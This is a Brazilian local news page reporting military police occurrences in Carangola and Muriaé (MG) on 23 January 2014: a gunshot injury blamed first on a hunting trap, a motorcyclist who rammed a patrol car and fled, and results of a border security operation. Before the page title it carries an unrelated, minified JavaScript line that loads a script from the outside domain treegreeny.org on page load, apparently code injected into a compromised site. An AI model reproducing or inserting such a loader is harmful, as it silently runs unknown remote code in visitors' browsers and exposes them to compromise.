;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrencias policiais em destaque 23/01/2014 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrencias policiais em destaque 23/01/2014

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 23/01/2014

                        75ª CIA PM- CARANGOLA-MG

 

NADA A REGISTRAR.

 

                        76ª CIA PM – MURIAÉ

 

PORTE ILEGAL DE ARMA DE FOGO ( APETRECHO PARA CAÇA ) EM MURIAÉ-MG.

Em 23/01/2014 às 22h37min, policias militares compareceram ao HSP, onde havia um indivíduo alvejado por arma de fogo, sendo constatado que à vitima R.S.A., de 36 anos, tinha sido alvejado na altura do ante braço, permanecendo internado naquele nosocômio para ser submetido a cirurgia. Os policiais em contato com a suposta vítima, indagando-a sobre o acontecido, tendo  R.S.A., de 36 anos, relatado que estava em uma fazenda na  ZONA RURAL DE MURIAÉ, e que foi uma espingarda que disparou em seu braço. De posse destas informações os militares deslocaram ate o local do fato com a tia da vitima, onde foi entregue um armadilha de caçar animais tipo ”trabuco” e não a espingarda. Os militares entraram em contato com R.S.A., de 36 anos, e indagaram do mesmo o porque primeiramente ele tinha passado uma espingarda e no local havia apenas um trabuco, gerando com isto uma suspeita sobre a veracidade dos fatos, tendo como resposta primeiramente que ele havia se enganado e que era mesmo um trabuco, porém, após longa conversa, o mesmo relatou que estava andando em seu cavalo com uma espingarda calibre 36, e sem motivo algum a mesma disparou em seu ante braço, e ele por medo de ser preso dispensou a mesma em um lugar que somente ele sabe, porém, pelo fato de não poder se deslocar para apresentar a arma por se encontra hospitalizado, relatou que assim que for liberado do ”Hospital São Paulo” irá mostrar o local em que a arma se encontra. Diante o ocorrido o ”trabuco” foi entregue na Delegacia de Polícia, esclarecendo que ao autor/vitima, foi dado voz de prisão em flagrante, porem já que ficou hospitalizado, não foi apresentado na Delegacia de Polícia, sendo feita sua escolta policial no ”Hospital São Paulo”, onde aguarda as demais providências.

DIREÇÃO PERIGOSA DE VEÍCULO EM MURIAÉ-MG.

Em 23/01/2014 às 17h04min, policiais militares em patrulhamento pela RUA ANTÔNIO PEREIRA GALVÃO, bairro ENCOBERTA, MURIAÉ, deparam com um indivíduo em atitude suspeita conduzindo uma motocicleta HONDA/CG TITAN, cor vermelha; que ao se aproximarem, reconheceram o condutor como sendo G.V.S.S., de 22 anos, conhecido no meio policial pela prática de diversos delitos, teriam percebido também que havia um volume na cintura do cidadão aparentando ser uma arma de fogo. Diante disso, os policiais decidiram abordar o suspeito, tendo parado a viatura policial, tendo o 2º SGT PM ASSIS dado ordem de parada ao suspeito em alto tom de voz e gesticulando com o braço. Simultaneamente o militar desembarcava da viatura, oportunidade em que o suspeito, desobedecendo a ordem legal do militar, teria investido com a motocicleta contra o militar colidindo contra a porta dianteira direita da viatura, colocando a integridade física do policial em risco. Em ato contínuo o autor evadiu realizando diversas manobras perigosas que colocavam em risco os demais veículos e pedestres que utilizavam a via, tomando rumo ao Bairro ENCOBERTA e posteriormente SANTA TEREZINHA, não sendo localizado, todavia, foi registrado ocorrência policial para as devidas providências.

47º BPM REALIZA OPERAÇÃO DIVISA SEGURA EM TODA SUA ÁREA DE ATUAÇÃO.

            Teve início no início da noite de 23/01/14, a Operação Divisa Segura, realizada em toda área de atuação do 47º BPM, compreendendo os municípios de Muriaé, Tombos, Eugenópolis, Antônio Prado de Minas e Palma, cidades limítrofes  com o Estado do rio de Janeiro.

            Foi empregado em toda operação, um efetivo de 19 policiais militares e 07 viatura, 07 patrulheiros rodoviários federal e 02 viaturas, 10 policiais civis e 03 viaturas, obtendo um resultado positivo no tocante a crescente sensação de segurança pública, por parte da população que faz uso destas áreas de divisa.

            Com as intervenções policiais foi obtido um resultado de 118 veículos abordados, sendo um apreendido em razão de ser produto de furto, 175 pessoas abordadas, sendo duas presas, 10 gramas de maconha apreendida, 04 notificações de trânsito lavradas, 03 documentos de veículos retidos.

   ASSESSORIA DE COMUNICAÇÃO DO 47° BPM – MURIAÉ / MG

RUA JOSÉ DE FREITAS LIMA Nº47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3265.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.